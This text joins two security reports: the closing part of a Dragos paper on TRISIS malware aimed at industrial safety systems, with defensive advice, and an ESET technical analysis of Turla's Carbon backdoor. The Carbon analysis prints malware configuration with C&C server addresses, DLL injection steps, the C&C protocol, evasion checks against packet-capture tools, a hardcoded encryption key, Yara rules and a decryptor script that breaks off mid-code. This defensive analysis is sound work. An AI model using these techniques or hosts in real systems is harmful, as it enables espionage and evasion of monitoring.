to impact but during or after the SIS impact. Keep in mind there is a wide range of defenses to detect and
stop the attacker prior to exposing human safety and equipment during stage 1 and earlier stage 2 phases.
TLP: WHITE information may be distributed without restriction
Stage 2 ICS Attack: Delivery
TRISIS requires being executed from a host that can directly communicate with the SIS controller(s). In
figure 1 cited above any host on L2: Process LAN can serve this purpose. This allows more options for the
attacker and greater scope of what needs to be defended. Delivery of TRISIS to any one of these hosts may
be accomplished through network transfer or USB/media transfer.
Strong architecture can deter, delay or detect adversarial actions as they deliver TRISIS from another network to a host that can communicate to the SIS environment. This is traditional network
concepts of segmentation through firewalls, dual factor authentication of interactive access, etc.
Once architectural foundations are in place, both active and passive defenses are needed. Automated log collection, passive network collection provides the basis of information needed for
forensic analysis after an event while strong tailoring of firewalls may limit/prevent delivery or
minimally serve as a triggering event for defenses to investigate and respond.
Stage 2 ICS Attack: Install/Modification
Once TRISIS resides on a host that has direct access, it is now in a dormant state until either the attacker
or unwitting user executes the binary. Once the TRISIS package is on the host, there are several options for
the defenders to stop or detect it proactively.
If the network architecture were already revised to limit what hosts can communicate to the SIS,
then the number of hosts that can successfully run TRISIS against SIS has already been reduced.
Again, this limits the attacker
s options while allowing more focused security controls. Strong
mechanisms to limit removable media can be considered- both technical (USB whitelisting or outright disabling of USB ports) or administrative (enforcing scanning of a USB drive prior to usage
in production equipment) are valuable. Strong filesystem permissions or execution whitelisting
technology become much easier to implement for engineering workstations or hosts that have
access to communicate with SIS.
Reliance on traditional signature-based detection (antivirus) is not sufficient. At the time of discovery, TRISIS was undetected by all antivirus engines. Instead, a more proactive approach is
required. For instance, Worldview customers were provided Yara signatures to identify TRISIS.
Those signatures also detect any binary compiled with py2exe as any such tool within an ICS or
SIS environment is an outlier and immediately suspect.
Additional proactive baselining can also occur. Hosts such as engineering workstations are often
not well managed. They generally are not part of Active Directory and have the option of running
a wide range of agents. However, baselining of known files, applications, services, USB insertions,
and user accounts can find deviations that could detect TRISIS files on the system. This can offer
assurances of the limited number of hosts that can communicate to the SIS.
TLP: WHITE information may be distributed without restriction
Stage 2 ICS Attack: Execute
The execution of the TRISIS attack can be broken down into two components: the launch of the process on
the host and the network communications from the compromised host to the SIS controller(s).
Architecturally limiting the TRISIS executable to run on the host via execution and/or hampering its ability
to communicate to the controllers via windows host firewall would stop any impact.
Additionally, proactive detection
such as identifying when a host is communicating with an SIS controller
can serve as an alarm. Even with strong architectures, misconfigurations occur that may allow a host that
shouldn
t have access to an SIS to communicate to it. Such alarms, even if they fail to stop an attack, are
vital to understanding and isolating the cause of the attack.
SIS environments can be some of the most defensible systems. They are largely simplistic and static- usually the most static of any ICS environment. However, good architecture, passive defenses, and active defenses are key to understand when an attack is in progress and how to repel when the attackers use novel
techniques. There is no such thing as an undetectable or unpreventable cyber attack, and as defenders, it
should be a priority to secure and monitor the safety systems responsible for protecting human life, the
environment, and the physical processes.
Dragos applies expert human intelligence and behavioral analytics to redefne industrial control system (ICS) cybersecurity. Its industry-first, ICS/OT cybersecurity ecosystem provides control systems operators with unprecedented
situational awareness over their environments, with comprehensive threat intelligence, detection, and response
capabilities. Dragos
solutions include the Dragos Platform, providing ICS/OT-specifc threat detection and response;
Dragos Threat Operations Center, providing ICS compromise assessment, threat hunting, and incident response
services; and Dragos WorldView, providing global, ICS-specifc threat intelligence. Headquartered in metropolitan
Washington DC, Dragos
team of ICS cybersecurity experts are practitioners who
ve lived the problems the industry
faces hailing from across the U.S. Intelligence Community to private sector industrial companies.
TLP: WHITE information may be distributed without restriction
Who Did It?
Achieving a level of confidence on attribution is not as difficult as often positioned. However, achieving a
high confidence of attribution can be incredibly difficult without access to a significant set of data or a long
period of historical analysis across numerous intrusions into victim environments. Infrastructure attacks
are often geopolitically sensitive topics that can carry real considerations between states. In addition, there
is little to no value in true attribution (state, agency, or operator identity) to defense teams. In many cases,
attribution can actually negatively affect defense teams. Due to the lack of value to defenders and the ramifications of incorrect attribution Dragos does not comment publicly on attribution.
Is TRISIS a Big Deal?
TRISIS is the fifth ever publicly known ICS-tailored malware following STUXNET, HAVEX, BLACKENERGY2,
and CRASHOVERRIDE. It is the first ever publicly known ICS-tailored malware to target safety instrumented
systems. For these reasons, it is of significant importance to the ICS community, and it should be analyzed
fully to capture lessons learned. The malware is not capable of scalable and long-term disruptions or destruction nor should there be any hype about the ability to leverage this malware all around the community. Attacks on an industrial process that are as specific in nature as TRISIS are considerably difficult to
repurpose against other sites although the tradecraft does reveal a blueprint to adversaries to replicate the
effort. However, because SIS are specifically designed and deployed to ensure the safety of the process, environment, and human life an assault on one of these systems is bold and unsettling. While fear and hype
are not appropriate in this situation, this is absolutely an escalation in the types of attacks we see against
ICS and should not be taken lightly.
Could This Attack Lead to Loss of Life?
Yes. BUT, not easily nor likely directly. Just because a safety system
s security is compromised does not
mean it
s safety function is. A system can still fail-safe, and it has performed its function. However, TRISIS
has the capability to change the logic on the final control element and thus could reasonably be leveraged
to change set points that would be required for keeping the process in a safe condition. TRISIS would likely
not directly lead to an unsafe condition but through its modifying of a system could deny the intended
safety functionality when it is needed. Dragos has no intelligence to support any such event occurred in the
victim environment to compromise safety when it was needed.
What are the Indicators of Compromise?
Dragos supplied Yara rules to our ICS WorldView customers to help defenders scope their environments
for this or similar malware. However, indicators of compromise (IOCs) are not appropriate in most cases
for industrial threats and capabilities. Technical data is often not similar in adversary capabilities between
victims. Defenders should instead focus on defense recommendations and the adversary tradecraft and
techniques.
TLP: WHITE information may be distributed without restriction
I Do Not Use Triconex Should I Care About TRISIS?
Vendors targeted in specific malware implementations such as Schneider Electric with TRISIS are victims.
The malware was not designed because Triconex was a good choice for this attack; the malware would
have been designed because the intended victim was using Triconex. If the victim was leveraging a different type of SIS, it is reasonable to conclude the malware would have targeted a different vendor. Therefore,
defenders should instead focus on monitoring their environments and being aware of how they have SIS
configured if it
s deployed according to best practices, and the ability to respond if there was an issue detected with the SIS. The Triconex connection is specific to this malware, but the lessons learned apply to
anyone using safety systems.
What Questions Should Executives Ask?
Executives should ask, and thus their security teams should anticipate these questions, questions such as:
Do we have an SIS and if so where and what type(s)? If we needed to collect data from the environment or
validate the system has not been modified could we? If the SIS is disrupted is there a cybersecurity component to the processes in place to determine root cause analysis and if an attack has occurred? Do we have
an incident response plan that factors in the loss of the SIS even if it does not immediately lead to an unsafe
situation? Is our SIS properly segmented off of the network and if not what monitoring do we have in place
to ensure it is not impacted?
I Want to Speak on or Write About Safety Instrumented System Security What Should I Know?
Please ensure you talk to a certified safety engineer. The security of SIS is important, but safety engineering
is a very specific skillset. What seems feasible and nuanced from security professionals may not fully represent the reality of the situation. I.e., please avoid sensationalist writing on the subject by including both
security and an engineering input. There have been presentations and topics at information security conferences on safety systems before that impress generalist audiences but are known to the community to
be inaccurate or simplistic; fantastic research but not holistic in how it is often implemented or discussed.
What that translates into is the
what is possible in a given scenario
should have an expert on the threat
and an expert on the SIS speaking.
Contact Information
1745 Dorsey Road
Hanover, MD 21076 USA
dragos.com | info@dragos.com
Carbon Paper: Peering into Turla
s second stage backdoor
www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/
By ESET Research posted 30 Mar 2017 - 02:00PM
March 30, 2017
The Turla espionage group has been targeting various institutions for many years. Recently,
we found several new versions of Carbon, a second stage backdoor in the Turla group arsenal.
Last year, a technical analysis of this component was made by Swiss GovCERT.ch as part of
their report detailing the attack that a defense firm owned by the Swiss government, RUAG,
suffered in the past.
This blog post highlights the technical innovations that we found in the latest versions of
Carbon we have discovered.
Looking at the different versions numbers of Carbon we have, it is clear that it is still under
active development. Through the internal versions embedded in the code, we see the new
versions are pushed out regularly. The group is also known to change its tools once they are
exposed. As such, we have seen that between two major versions, mutexes and file names
are being changed.
Infection vectors
The Turla group is known to be painstaking and work in stages, first doing reconnaissance on
their victims
systems before deploying their most sophisticated tools such as Carbon.
1/25
A classic Carbon compromise chain starts with a user receiving a spearphishing email or
visiting a previously compromised website, typically one that the user visits regularly
technique known as a watering hole attack.
After a successful attack, a first stage backdoor
such as Tavdig or Skipper
is installed on
the user machine. Once the reconnaissance phase is over, a second stage backdoor, like
Carbon, is installed on key systems.
Technical analysis
Carbon is a sophisticated backdoor used to steal sensitive information from targets of interest
by the Turla group.
This malware shares some similarities with
Uroburos
, a rootkit used by the same group. The
most relevant resemblance is the communication framework. Indeed, both of them provide
communication channels between different malware components. The communication objects
are implemented in the same way, the structures and vtables look identical except that there
are fewer communication channels provided in Carbon. Indeed, Carbon might be a
lite
version of Uroburos (without kernel components and without exploits).
For Turla group to decide to install Carbon on a system, a (stage 1) recognition tool is usually
delivered first to the target: this tool collects several pieces of information about the victim
machine and its network (through Tavdig or Skipper for example). If the target is considered
interesting enough, it will receive more sophisticated malware (such as Carbon or Uroburos).
Global architecture
The Carbon framework consists of:
a dropper that installs the carbon components and its configuration file
a component that communicates with the C&C
an orchestrator that handles the tasks, dispatches them to other computers on the
network and injects into a legitimate process the DLL that communicates with the C&C
a loader that executes the orchestrator
Carbon Dating
The orchestrator and the injected library have their own development branch.
Thanks to the compilation dates and the internal versions numbers hardcoded in the PE files,
we might have the following timeline:
2/25
Table 1
Carbon development timeline
Carbon files
The files from the Carbon framework can have different names depending on the version but
they all keep the same internal name (from the metadata) regardless of the version:
the dropper:
SERVICE.EXE
the loader:
SERVICE.DLL
or
KmSvc.DLL
the orchestrator:
MSIMGHLP.DLL
the injected library:
MSXIML.DLL
Each of these files exist in 32bit and in 64bit versions.
Working directory
Several files are created by Carbon to keep logs, tasks to execute and configuration that will
modify the malware
s behavior. The contents of the majority of these files are encrypted with
the CAST-128 algorithm .
A base working directory will contain the files/folders related to Carbon. This directory is
chosen randomly among the folders in %ProgramFiles% but excluding
WindowsApps
The filenames are hardcoded in the orchestrator. The same names are used in the 3.7x+
branch. Because the injected library accesses the same files as the orchestrator, it is another
easy way to link a library version and an orchestrator.
Carbon 3.7x files tree view:
3/25
\%carbon_working_folder\% // base folder
0208 // tasks results and logs files
C_56743.NLS // contains list of files to send to the C&C server,
this file is neither compressed nor encrypted
asmcerts.rs
getcerts.rs
miniport.dat // configuration file
msximl.dll
Nls // contains tasks (commands to be executed or PE file) and their
configuration files
// injected library (x32)
a67ncodc.ax // tasks to be executed by the orchestrator
b9s3coff.ax // tasks to be executed by the injected library
System // plugins folder
bootmisc.sdi // not used
qavscr.dat
// error log
vndkrmn.dic // log
ximarsh.dll // injected library (x64)
Since version 3.80, all filenames have changed.
Carbon 3.8x files tree view:
4/25
\carbon_working_folder\% // base folder
0409 // contains tasks (commands to be executed or PE file) and their
configuration files
cifrado.xml
encodebase.inf // tasks to be executed by the orchestrator
1033 // tasks results and logs files
dsntype.gif // contains list of files to send to the C&C server, this
file is neither compressed nor encrypted
// tasks to be executed by the injected library
en-US // plugins folder
asmlang.jpg // not used
fsbootfail.dat // error log
mkfieldsec.dll // injected library (x32)
preinsta.jpg
// log
wkstrend.xml
// configuration file
xmlrts.png
zcerterror.png
File access
In the case of the majority of the files from the Carbon working folder, when one is accessed
by the malware, the following steps are taken:
a specific mutex is used to ensure its exclusive access.
the file is decrypted (CAST-128)
when the operations on the file are done, the file is reencrypted (CAST-128)
the mutex is released
Mutexes
The following mutexes are created by the orchestrator in Carbon 3.7x:
Global\\MSCTF.Shared.MUTEX.ZRX
(used to ensure exclusive access to
vndkrmn.dic
Global\\DBWindowsBase
(used to ensure exclusive access to
C_56743.NLS
Global\\IEFrame.LockDefaultBrowser
(used to ensure exclusive access to
b9s3coss.ax
Global\\WinSta0_DesktopSessionMut
(used to ensure exclusive access to
a67ncodc.ax
Global\{5FA3BC02-920F-D42A-68BC-04F2A75BE158}
(used to ensure exclusive
access to new files created in
folder)
5/25
Global\\SENS.LockStarterCacheResource
(used to ensure exclusive access to
miniport.dat
Global\\ShimSharedMemoryLock
(used to ensure exclusive access to
asmcerts.rs
In carbon 3.8x, the filenames and the mutex names have changed:
Global\\Stack.Trace.Multi.TOS
(used to ensure exclusive access to
preinsta.jpg
Global\\TrackFirleSystemIntegrity
(used to ensure exclusive access to
dsntype.gif
Global\\BitswapNormalOps
(used to ensure exclusive access to
cifrado.xml
Global\\VB_crypto_library_backend
(used to ensure exclusive access to
encodebase.inf
Global\{E41B9AF4-B4E1-063B-7352-4AB6E8F355C7}
(used to ensure exclusive
access to new files created in
0409
folder)
Global\\Exchange.Properties.B
(used to ensure exclusive access to
wkstrend.xml
Global\\DatabaseTransSecurityLock
(used to ensure exclusive access to
xmlrts.png
These mutexes are also used in the injected dll to ensure that the orchestrator has been
executed.
Configuration File
The configuration file affects the malware
s behavior. The file format is similar to
files used
by Windows. It contains among others:
object_id
that is a unique uuid used to identify the victim, when the value is not set
in the file, it is generated randomly by the malware
a list of processes into which code is injected (iproc)
the frequency and time for task execution / backup logs / connection to the C&C ([TIME])
the IP addresses of other computers on the network ([CW_LOCAL])
the C&C server addresses ([CW_INET])
the named pipes used to communicate with the injected library and with the other
computers ([TRANSPORT])
This file might be updated later. Indeed, in the communication library, some cryptographic keys
are used to encrypt/decrypt data and these keys are retrieved from a section [CRYPTO] in the
configuration file that does not exist when the file is dropped from the loader resources.
Carbon 3.77 configuration file:
[NAME]
object_id=
iproc =
iexplore.exe,outlook.exe,msimn.exe,firefox.exe,opera.exe,chrome.exe
ex = #,netscape.exe,mozilla.exe,adobeupdater.exe,chrome.exe
6/25
[TIME]
user_winmin = 1800000
user_winmax = 3600000
sys_winmin = 3600000
sys_winmax = 3700000
task_min = 20000
task_max = 30000
checkmin = 60000
checkmax = 70000
logmin = 60000
logmax = 120000
lastconnect=111
timestop=
active_con = 900000
time2task=3600000
[CW_LOCAL]
quantity = 0
[CW_INET]
quantity = 3
address1 = doctorshand.org:80:/wp-content/about/
address2 = www.lasac.eu:80:/credit_payment/url/
address3 = www.shoppingexpert.it:80:/wp-content/gallery/
[TRANSPORT]
system_pipe = comnap
spstatus = yes
adaptable = no
7/25
[DHCP]
server = 135
[LOG]
logperiod = 7200
[WORKDATA]
run_task=
run_task_system=
Logfile
The Carbon framework includes a logfile that is used to log actions performed by the malware
and information on the system that can be useful to the malware operator (for example if an
analysis tool such as WireShark is running on the machine).
The log
s format has not changed since Carbon 3.71:
Date|Time|Object-Id|Source|Message
example
[LOG]
start=1
20/02/17|12:48:24|8hTdJtUBB57ieReZAOSgUYacts|s|OPER|New object ID
generated '8hTdJtUBB57ieReZAOSgUYacts'|
20/02/17|12:48:24|8hTdJtUBB57ieReZAOSgUYacts|s|ST|3/81|0|
20/02/17|12:48:24|8hTdJtUBB57ieReZAOSgUYacts|s|START OK
This file is periodically backed up and sent to the C&C.
Dropper
The dropper is the only executable that is not a DLL. It is the first PE file to be executed: it is
used to extract the other components from its resources.
The PE files that are used to load the main components are extracted into the Windows
system directory while the orchestrator, the library used to communicate with the C&C and the
configuration file are extracted into the Carbon working directory.
8/25
A new section is appended into a random
.inf
file from %SystemRoot%\INF. The section
name is the volume serial disk number of the compromised machine and a value
root
created with the chosen Carbon working directory.
Example:
[5049654F]
root="C:\Program Files\Windows Portable Devices"
Loader
This part of the component is used to load the orchestrator.
A service that ensures Carbon
s persistency is created. Its name can either be
srservice
ipvpn
or
hkmsvc
depending of the operating system version running on the compromised
machine.
The Carbon working directory is retrieved by walking through the
%windir%\inf
folder and
looking for the file that contains the Carbon base path.
Last but not least, the function
ModuleStart
(in Carbon 3.71) or
ModStart
(since Carbon
3.77) from the orchestrator (located in the Carbon base folder) is called.
Orchestrator
The orchestrator is the main component of the Carbon framework. It is mainly used to inject
code into a process that communicates legitimately over the Internet and to dispatch the tasks
received from the injected library to other computers on the same network either through
named pipes or TCP.
Seven threads are created by the malware. It is easy to identify Carbon
s characteristics
because each thread has a specific role:
Configuration fetching
Because the configuration file can be updated by the malware, some attributes like the C&C
server addresses are monitored every 10 minutes.
Check Carbon storage folder periodically
There is a storage folder located in the Carbon working directory. This folder contains some
files downloaded from the C&C server (tasks that are either commands to be executed or PE
files, and their configuration files).
This thread will run continuously and check every two hours whether there is still enough
space available in this folder; if not, a notification is written into the logfile.
9/25
Task execution
The execution of the tasks in the context of the orchestrator process is very similar to the way
in which it is performed in the communication library (cf Communication library / Tasks
execution).
Unlike the communication library, it is the file
encodebase.inf
(for Carbon v3.8x) or
a67ncode.ax
that contains the list of the tasks to execute.
Each line of this file is composed in the following way:
task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath |
[execution_mode | username | password]
The five first fields are required, while the last three are optional. If the field
execution_mode
exists, its value will affect the way the task is executed:
0 or 1: normal execution
2: the task is executed in the security context of a specific user (credentials are provided
through the username/password fields)
3 or 4: the task is executed in the security context of the user represented by the
explorer.exe
token
Like Uroburos/Snake, Carbon can dispatch tasks to other computers from the same network
via named pipe or TCP. It is useful to be able to dispatch and execute tasks on computers that
do not have Internet access.
Communication channels
Uroburos used several types of communication transports than can be categorized as follows:
type 1: TCP
type 2: enc, np, reliable, frag, m2b, m2d
type 3: t2m
type 4: UDP, doms, domc
10/25
Carbon uses a reduced number of communication channels:
type 1: TCP, b2m
type 2: np, frag, m2b
The data sent to peers are usually fragmented and transported either by TCP or via a named
pipe. If, for example, fragmented data are sent from a computer to another one by a named
pipe, an object
frag.np
is set up. In this case the mother class
frag
constructor will be called
followed by a call to the constructor subclass
There is a structure composed of several handlers for each objects: initialize communication,
11/25
connection (to a pipe / IP address), read data, send data etc.
How a task is forwarded to another computer
Several steps are performed to send data from one computer to another:
a communication channel is created (frag.np or frag.tcp object) with a specific named
pipe / ip address
options are given to the object communication (for example : the fragment
s size,
information about the peer etc.)
connection to the peer
an authentication step is performed between the host and the peer:
there is a handshake process where the host is sending the
magic
value
A110EAD1EAF5FA11
and expects to receive
C001DA42DEAD2DA4
from the
peer
a command
is sent to the peer where the host sends the victim uuid and
expects to receive the same uuid
if the authentication was successful, the data are sent to the peer
All the communication between the host and the peer are encrypted with CAST-128
Note that this P2P feature is also implemented in the communication DLL.
Plugins
This malware supports additional plugins to extend its functionalities.
In the configuration file, there is a section named
PLUGINS
. It might not exist when the
configuration file is dropped from the loader resources but this file can be updated by the
malware. The section
PLUGINS
contains a line formed this way:
%plugin_name%=%enabled%|%mode%[:%username%:%password%]|%file_path%
%file_path% can be either the path to a PE file or to a file containing a command line to be
executed. %enabled% is a string that is used to know if the plugin has to be executed. If it is
the case, that string value is
enabled
The attribute %mode% is used to control the context in which to execute the PE file/command
line. It can be either:
1 = execution with current user privilege in the current process context through
CreateProcess().
2 = execution as the user specified in the configuration (:%username%:%password%
attributes), the token of this specific user is retrieved through the LogonUserAs()
function.
3 = execution in the security context of the user represented by the
explorer.exe
token
(the token of the process
explorer.exe
is duplicated and passed through the
12/25
CreateProcessAsUser() function.
4 = similar than 3 but the environment variables for the user represented by the
explorer.exe
token are retrieved and passed to the function CreateProcessAsUser()
If it is a PE file:
the file is loaded into the malware process memory
the module is parsed to check if it is a DLL
if the module is a DLL and exports a function
ModStart
(since Carbon 3.77) or
ModuleStart
(for older versions of Carbon), a new thread is created to execute this
function.
if the module is not a DLL but a valid PE, it is executed from the entry point.
Injection of the communication library into remote processes
The library that is used to communicate with the C&C server is injected into remote processes.
In order to know where to inject this DLL, the configuration file is parsed. The section
[NAME]
contains a field
iproc
containing a list of processes that can legitimately communicate to
Internet.
Example:
[NAME]
iproc =
iexplore.exe,outlook.exe,msimn.exe,firefox.exe,opera.exe,chrome.exe
For each process on the list that is running on the system, if its parent process name is either
explorer.exe
or
ieuser.exe
, the DLL will be injected into this process.
The process injection is very classical:
the functions
CreateToolHelp32Snapshot / Module32FirstW / Module32NextW
are
used to retrieve the base address of the module
kernel32.dll
the module EAT is parsed to get the address of the function
LoadLibraryW
the privilege
SeDebugPrivilege
is enabled for the current process
memory is allocated into the remote process and the library path is written into it
NtCreateThreadEx or CreateRemoteThread (if the address of the first function cannot be
retrieved) is called to execute LoadLibraryW to load the DLL into the memory of the
remote process *
Communication library
The following analysis is based on the version 4.x of msximl. This component may have
changed in the latest versions.
Configuration fetching
13/25
Besides the code in the
Configuration fetching
thread from the orchestrator (which is similar),
a field
sethttp1
is retrieved from the [TRANSPORT] section.
If this value is set, HTTP 1.1 will be used for future connections.
Tasks execution
The tasks are retrieved from the C&C server.
The tasks to be executed by the communication library are listed in the file
b9s3coff.ax
(for
Carbon v3.7x) or
cifrado.xml
(for Carbon v3.8x).
Each line of this file is composed in the following way:
task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath
The task file and its config are decrypted (CAST-128) and the task executed. There are some
options that are retrieved from the Carbon configuration file:
time2task
is used to set a
timeout for the task execution (1 hour by default) while
task_min
and
task_max
are used as
to wait a random time between the execution of the tasks on the task list (the random time will
be set between
task_min
and
task_max
). These parameters come from the section [TIME].
If the task is a valid DLL file, it is loaded in the current process memory and a new thread is
created to execute its
start
export. Otherwise, this is probably a command to execute. In this
case, the configuration file is parsed. Like the Carbon configuration file, the task configuration
file is formed as a windows
file and should contain a section [CONFIG] with the following
parameters:
[CONFIG]
NAME (
cmd.exe
by default)
RESULT (
stdout
by default)
COMPRESSION (
by default)
DELETE (
by default)
The command with its arguments is executed through CreateProcess() function and the results
are stored in the %task_result_filepath% file if the RESULT option is not set to
stdout
, while
error or additional info are added to the task logfile.
If the option RESULT is set to stdout:
the result task file is deleted and the task execution output is written to the log task file
the line
task_id |
| task_log_filepath | object_id
is added at the end of the file
C_56743.NLS
(Carbon 3.7x) or
dsntype.gif
(Carbon 3.8x)
Otherwise:
14/25
the task execution is outputted to the task result file and the errors / additional info to the
task logfile
the line
task_id |
| task_log_filepath | task_result_filepath | object_id
is added at the
end of the file
C_56743.NLS
(Carbon 3.7x) or
dsntype.gif
(Carbon 3.8x)
In both cases, the same line as written into
C_56743.NLS
is also written into the field
run_task
from the Carbon configuration file. It might be intended as a way for the malware
authors to know which is the last task executed when the configuration file is sent to the C&C
server (check
Configuration file backup
Log rotation
The logfile is backed up and sent to the C&C server periodically (by default this is done every
two hours).
Like the backup of the configuration file, this action is performed only during specific times of
the day.
Indeed, the log rotation will be performed only when the current local time is in the range of
what is defined in the configuration file.
The fields
wh_min
and
wh_max
are retrieved from the [TIME] section of the configuration
file (by default: 8 and 20). The thread will execute the code only if the current hour of the day is
between %wh_min% and %wh_max%.
If there is a value for the attribute
timestop
from the [TIME] section (which looks like
wDay:wMonth:wYear:wHour:wMinute
), the thread will execute the code only after this
specific datetime.
The attributes
lastsend
and
logperiod
from the [LOG] section are used to specify a delay
time when to backup and send the log to the C&C server. (by default: every two hours).
A temporary file with a random name prefixed by
is created in the folder
(for Carbon
v3.7x) or
1033
(for Carbon v3.8x). The logfile content is copied into this new file. It is then
compressed with Bzip2 and encrypted (CAST-128).
A new line is added at the end of the file
C_56743.NLS
(for Carbon v3.7x) or
dsntype.gif
(for Carbon v3.8x):
10|1|%s|%s
1st field: an ID to identify the file as a logfile
2nd field: 1 (file to be sent to the C&C server)
3rd field: the temp file path
4rd field: the victim uuid
Last but not least, the attribute
lastsend
is updated with the current time and the original
logfile is deleted.
15/25
Communication with the C&C server
The code of this thread is used to retrieve new tasks from the C&C server, to send new files to
the server (the files listed in the file
C_56743.NLS
dsntype.gif
) and to send the new tasks
to the orchestrator.
First request
A random C&C server address is chosen from the ones in the section
CW_INET
. If the port
and HTTP resource path are not specified, the default is to use port 80 and
/javascript/view.php
A user agent is set up in the following way:
the version of Internet Explorer is retrieved through the registry key:
HKLM\Software\Microsoft\Internet Explorer\Version
and is concatenated to the string
Mozilla/4.0 (compatible; MSIE %d.0;
example:
Mozilla/4.0 (compatible; MSIE 8.0.6001.18702.0;
concatenate the previous string with the OS major/minor version values (through
GetVersionExA())
Mozilla/4.0 (compatible; MSIE 8.0.6001.18702.0; Windows NT 5.1; Trident/4.0
enumerate the values key in
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User
Agent\Post Platform
and concatenate each value to the previous string and then
append a closing paren.
example:
Mozilla/4.0 (compatible; MSIE 8.0.6001.18702.0; Windows NT 5.1;
Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729;
.NET4.0C; .NET4.0E; Media Center PC 6.0; SLCC2)
The field
trans_timemax
from the section [TIME] is retrieved. It is used to set the timeout for
internet requests (through InternetSetOption()). It has a value of 10 minutes by default.
A first GET request is performed on the root page of the C&C web server to check that the
host is alive. If no packet capture is running on the system, a new request is done on the C&C
server to check if new tasks are available. A
PHPSESSID
cookie is added to the request with
the victim uuid as its value. A header
Referer
is added as well and set to the C&C server
URL.
The malware is expecting to get an answer to the GET request similar to:
in the page with a base64 encoded blob in its
value
attribute.
Once decoded, this blob contains:
an encrypted block of 128 bytes that contains a structure
PUBLICKEYSTRUC
followed
by a cryptographic key (probably a 3DES key)
signature data (128 bytes) to verify the integrity of the next block
a block of encrypted data that contains the task
The malware uses an RSA private key (retrieved from the field
keypair
from the section
[CRYPTO] of the configuration file) to decrypt the first block and then uses the freshly
decrypted key to decrypt the third block. This block of data can be either:
a task to be executed
the data are decrypted and stored in few temporary files, the task (a command or a
19/25
PE file) and its configuration file in the
folder and the output files (file that will
contains the task results and the logfile) are stored in the folder
0208
(or
respectively
0409
and
1033
for Carbon v3.8x)
task_id | task_filepath | task_config_filepath | task_result_filepath |
task_log_filepath
this line is appended to beginning of the file
b9s3coff.ax
(cifrado.xml on v3.8x)
a task to be executed by the orchestrator
the data are decrypted and stored in few temporary files (the task, its configuration
etc) in the
and
0208
folder (or
0409
and
1033
for Carbon v3.8x)
depending of the content of the data, one of these lines will be added to the
beginning of the file
a67ncode.ax
(encodebase.info on v3.8x)
task_id | task_filepath | task_config_filepath | task_result_filepath |
task_log_filepath
task_id | task_filepath | task_config_filepath | task_result_filepath |
task_log_filepath | execution_mode | username | password
task_id | task_filepath | task_config_filepath | task_result_filepath |
task_log_filepath | execution_mode
a new RSA server public key
in this case, the configuration file is updated with the new key encoded in base64
(field publicc)
data to be sent to an instance of Carbon running in another computer in the same
network
the data can contains a specific IP address and port, a named pipe or a named
pipe with a username and password.
Check Internet availability
Each hour, the internet connection is checked. A first check is done by calling the function
InternetAttemptConnect(). If it works, another test is done by sending HTTP GET requests to
the following websites:
www.google.com
www.yahoo.com
www.bing.com
update.microsoft.com
windowsupdate.microsoft.com
microsoft.com
An event is used to notify the other threads in case of the loss of Internet access.
Configuration file backup
Similar to the logfile, the configuration file is also periodically backed up and sent to the C&C
server. The thread executes the code in a specific range of time (between 8h and 20h by
default) .
20/25
The value
configlastsend
is retrieved from the section [TIME] of the configuration file. If the
config file has been sent over a month ago, the config file is copied into a temporary file with a
random name prefixed by
in the folder
(for Carbon v3.7x) or
1033
(for Carbon
v3.8x). This file is then encrypted with CAST-128 algorithm.
To notify the thread that communicates with the C&C server that a new file is ready to be sent
to the server, the following line is appending to the file
C_56743.NLS
(for Carbon v3.7x) or
dsntype.gif
(for Carbon v3.8x):
11|1|%s|%s
1st field: an ID to identify the file as a config file
2nd field: 1 (file to be sent to the C&C server)
3rd field: the temp filepath
4rd field: the victim uuid
Last but not least, the attribute
configlastsend
is updated with the current time.
Additional Notes
Calling API functions
The base address of the modules of interest are retrieved by either parsing the PEB or (if the
modules are not loaded into the process memory) by loading the needed files from disk into
memory and parsing their headers to get their base addresses.
Once the base addresses are retrieved, the PEB is walked again and the field
LoadCount
from the structure LDR_DATA_TABLE_ENTRY is checked. This value is used as a reference
counter, to track the loading and unloading of a module.
LoadCount
is positive, the module EAT is parsed to get the needed function address.
Encryption
The module and function names are encrypted (at least since v3.77; it was not the case in
v3.71) in a simple way, a logical shift of 1 bit being applied to each characters.
The processes
names are encrypted as well by just XOR
ing each character with the key 0x55
(for Carbon v3.7x at least since v3.77) and with the key 0x77 for Carbon v3.8x.
With only a few the exceptions, each file from the Carbon working directory is encrypted with
the CAST-128 algorithm in OFB mode. The same key and IV are used from the version 3.71
until the version 3.81:
key =
\x12\x34\x56\x78\x9A\xBC\xDE\xF0\xFE\xFC\xBA\x98\x76\x54\x32\x10
IV =
\x12\x34\x56\x78\x9A\xBC\xDE\xF0
Check if packet capture is running
21/25
Before communicating with the C&C server or with other computers, the malware ensures that
none of the most common packet capture software is running on the system:
TCPdump.exe
windump.exe
ethereal.exe
wireshark.exe
ettercap.exe
snoop.exe
dsniff.exe
If any of these processes are running, no communication will be done.
Carbon IoCs are also available on ESET
s GitHub repository https://github.com/eset/malwareioc/tree/master/turla
Appendices
Yara rules
import
rule generic_carbon
strings:
$s1 =
ModStart
$s2 =
ModuleStart
$t1 =
STOP|OK
$t2 =
STOP|KILL
condition:
(uint16(0) == 0x5a4d) and (1 of ($s*)) and (1 of ($t*))
rule carbon_metadata
condition:
(pe.version_info[
InternalName
] contains
SERVICE.EXE
pe.version_info[
InternalName
] contains
MSIMGHLP.DLL
pe.version_info[
InternalName
] contains
MSXIML.DLL
and pe.version_info[
CompanyName
] contains
Microsoft Corporation
Carbon files decryptor/encryptor
carbon_tool.py
22/25
#!/usr/bin/env python2
from Crypto.Cipher import CAST
import sys
import argparse
def main():
parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument(
encrypt
, help=
encrypt carbon file
, required=False)
parser.add_argument(
decrypt
, help=
decrypt carbon file
, required=False)
try:
args = parser.parse_args()
except IOError as e:
parser.error(e)
return 0
if len(sys.argv) != 3:
parser.print_help()
return 0
key =
\x12\x34\x56\x78\x9A\xBC\xDE\xF0\xFE\xFC\xBA\x98\x76\x54\x32\x10
iv =
\x12\x34\x56\x78\x9A\xBC\xDE\xF0
cipher = CAST.new(key, CAST.MODE_OFB, iv)
if args.encrypt:
plaintext = open(args.encrypt,
).read()
while len(plaintext) % 8 != 0:
plaintext +=
\x00
data = cipher.encrypt(plaintext)
